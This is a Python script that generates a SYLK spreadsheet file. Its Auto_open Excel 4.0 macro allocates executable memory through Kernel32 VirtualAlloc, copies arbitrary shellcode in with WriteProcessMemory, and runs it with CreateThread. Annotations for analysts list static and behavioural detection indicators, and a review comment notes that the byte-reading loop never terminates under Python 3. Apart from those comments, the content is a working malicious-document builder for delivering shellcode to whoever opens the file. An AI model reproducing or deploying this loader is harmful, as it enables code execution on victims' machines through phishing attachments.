#!/usr/bin/env python3
import sys
# Some of this code is bastardised from code by @StanHacked
# For a breakdown of this technique I recommend watching
# http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
def bytes2int(byte):
    """Interpret a bytes object as an unsigned big-endian integer.

    For the one-byte reads performed elsewhere in this file the result is
    that byte's value (0-255); an empty bytes object yields 0.
    """
    value = int.from_bytes(byte, "big")
    return value
# SYLK (.slk) preamble that is emitted ahead of the encoded data cells.
# What the text below declares, for analysts and detection authors:
#   * "NN;NAuto_open;ER1C1" defines a name Auto_open that points at R1C1
#     (Auto_open is the name Excel treats as an auto-run macro entry).
#   * Column 1 (X1) holds Excel 4.0 macro formulas: a CALL to Kernel32
#     VirtualAlloc, a WHILE loop that CALLs WriteProcessMemory once per
#     non-empty cell while incrementing the counter in R1C3 (destination
#     offset stepped by 20), then a CALL to CreateThread, then HALT().
#   * The 4096 and 64 arguments to VirtualAlloc match MEM_COMMIT and
#     PAGE_EXECUTE_READWRITE in the Windows API, i.e. a writable and
#     executable allocation made from inside the Excel process.
# Detection / mitigation notes:
#   * The literal strings "NAuto_open" and ECALL("Kernel32", ...) inside a
#     file starting with "ID;P" are stable static indicators for mail/web
#     gateway rules and file scanners.
#   * Excel allocating executable memory and creating a thread is a
#     behavioural signal for endpoint monitoring.
#   * Filtering .slk attachments and restricting Excel 4.0 (XLM) macros by
#     policy reduce exposure to this document type.
# The string is emitted verbatim: changing any character changes the output.
SHELLCODE_HEADER = """ID;P
O;E
NN;NAuto_open;ER1C1;KSpreadsheet;F
C;X1;Y1;K0;ER1C2()
C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
C;X1;Y8;K0;ESELECT(, "R[1]C")
C;X1;Y9;K0;ENEXT()
C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
C;X1;Y11;K0;EHALT()
"""
def generate_slk(shellcode_path):
    """Public entry point: build the SLK text for the file at *shellcode_path*.

    Delegates to build_shellcode_slk() and hands its result back unchanged.
    """
    slk_text = build_shellcode_slk(shellcode_path)
    return slk_text
def build_shellcode_slk(shellcode_path):
    """Encode the bytes of the file at *shellcode_path* as SLK cell records.

    The output starts with SHELLCODE_HEADER. Each input byte is written as a
    ``CHAR(n)`` term; terms are joined with ``&`` and grouped 20 per cell in
    column 2 (``C;X2;Y<row>``), rows numbered from 1. After the data cells a
    final column-2 cell containing ``RETURN()`` and the ``E`` end-of-file
    record are appended, and the accumulated text is returned.

    For analysts: the result is plain text, and the long
    ``CHAR(n)&CHAR(n)&...`` runs in column 2 are a recognisable static
    pattern alongside the header's Auto_open name and Kernel32 CALLs.

    NOTE(review): the file is opened in "rb" mode, so ``f.read(1)`` returns
    bytes, while the loop condition compares against the str literal ``""``.
    Under Python 3 (the interpreter named in the shebang) that comparison is
    never equal, so as written the loop has no reachable exit at end of file.
    """
    #print("[*] Building shellcode exec SLK")
    slk_output = SHELLCODE_HEADER
    with open(shellcode_path, "rb") as f:
        byte = f.read(1)
        # i counts the CHAR() terms already written to the current cell;
        # cell is the row number of the current column-2 cell.
        i = 0
        cell=0
        while byte != "":
            if i == 0:
                # First term of a cell: open a new column-2 record.
                cell=cell+1
                slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
            else:
                # Later terms are concatenated onto the same formula.
                slk_output+=("&")
            slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
            byte = f.read(1)
            i+=1
            # 20 terms per cell matches the "R1C3 * 20" stride used by the
            # WriteProcessMemory formula in SHELLCODE_HEADER.
            if i == 20:
                slk_output+=("\n")
                i = 0
    # Trailing cell with RETURN(), followed by the SLK "E" end record.
    cell=cell+1
    slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
    return slk_output